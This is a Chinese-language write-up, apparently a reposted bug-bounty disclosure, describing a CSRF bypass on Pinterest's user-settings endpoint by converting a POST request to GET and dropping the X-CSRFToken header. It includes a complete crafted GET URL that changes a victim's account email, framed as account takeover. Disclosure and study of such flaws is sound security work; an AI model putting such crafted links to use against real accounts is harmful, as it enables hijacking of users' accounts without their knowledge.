内容简介:当浏览”1)首先,我将POST请求中的”X-CSRFToken”头删掉,然后通过burpsuit转发,服务器响应error “/resource/UserSettingsResource/update/ didn’t finish after 8 seconds”,这意味着CSRF令牌正在进行验证2)然后,我将上面的POST请求更改为GET请求,同样删掉”X-CSRFToken”,转发之后我得到响应”200 ok”
哪里有BUG??
当浏览” https://www.pinterest.com"时,我发现CSRF tokens是通过http头”X-CSRFToken”传递的,所以正常情况下要验证CSRF token的话,请求如下所示:
POST /_ngjs/resource/UserSettingsResource/update/ HTTP/1.1 Host: www.pinterest.com Content-Type: application/x-www-form-urlencoded X-CSRFToken: <CSRF Token> …….. …….. <POST Parameters>
1)首先,我将POST请求中的”X-CSRFToken”头删掉,然后通过burpsuit转发,服务器响应error “/resource/UserSettingsResource/update/ didn’t finish after 8 seconds”,这意味着CSRF令牌正在进行验证
2)然后,我将上面的POST请求更改为GET请求,同样删掉”X-CSRFToken”,转发之后我得到响应”200 ok”
账号接管
这是一个基于GET请求的CSRF,我们需要做的仅仅是制作一个URL链接,将所有通过POST传递的参数通过GET请求进行传递(不是所有程序都接受这种方法,大家可以通过burpsuit自带的”change request method”来转换)
https://www.pinterest.com/_ngjs/resource/UserSettingsResource/update/?source_url=%2Fsettings%2F&data=%7B%22options%22%3A%7B%22impressum_url%22%3Anull%2C%22last_name%22%3A%22dummy%22%2C%22custom_gender%22%3Anull%2C%22locale%22%3A%22en-US%22%2C%22has_password%22%3Atrue%2C%22email_settings%22%3A%22Everything+%28except+emails+you%27ve+turned+off%29%22%2C%22news_settings%22%3A%22Activity+from+other+people+on+Pinterest%22%2C%22id%22%3A%22%22%2C%22is_write_banned%22%3Afalse%2C%22first_name%22%3A%22dummyuser%22%2C%22push_settings%22%3A%22Everything+%28except+push+you%27ve+turned+off%29%22%2C%22personalize_from_offsite_browsing%22%3Atrue%2C%22facebook_timeline_enabled%22%3Afalse%2C%22email_changing_to%22%3Anull%2C%22personalize_nux_from_offsite_browsing%22%3Afalse%2C%22is_tastemaker%22%3Afalse%2C%22type%22%3A%22user_settings%22%2C%22email%22%3A%22anytestemail%40user.com%22%2C%22website_url%22%3A%22%22%2C%22location%22%3A%22%22%2C%22username%22%3A%22dummyuser%22%2C%22pfy_preference%22%3Atrue%2C%22facebook_publish_stream_enabled%22%3Afalse%2C%22email_bounced%22%3Afalse%2C%22is_partner%22%3Anull%2C%22ads_customize_from_conversion%22%3Atrue%2C%22additional_website_urls%22%3A%5B%5D%2C%22about%22%3A%22test%22%2C%22gender%22%3A%22male%22%2C%22age%22%3Anull%2C%22exclude_from_search%22%3Afalse%2C%22birthdate%22%3Anull%2C%22show_impressum%22%3Afalse%2C%22email_biz_settings%22%3A%22Everything+%28includes+announcements%2C+expert+tips%2C+creative+ideas%2C+and+more%29%22%2C%22country%22%3A%22IN%22%2C%22hide_from_news%22%3Afalse%2C%22collaborative_boards%22%3A%5B%5D%7D%2C%22context%22%3A%7B%7D%7D
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:
- 图解源码 | 接管SpringMVC的自动配置
- 通过暴露的docker.sock文件接管容器
- PHP中使用Redis接管文件存储Session
- GandCrab后继有人?Sodinoki勒索软件接管战场
- 有漏洞!黑客可以完全接管你的路由器
- Wordpress 插件出现漏洞,网站可能被攻击者接管
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
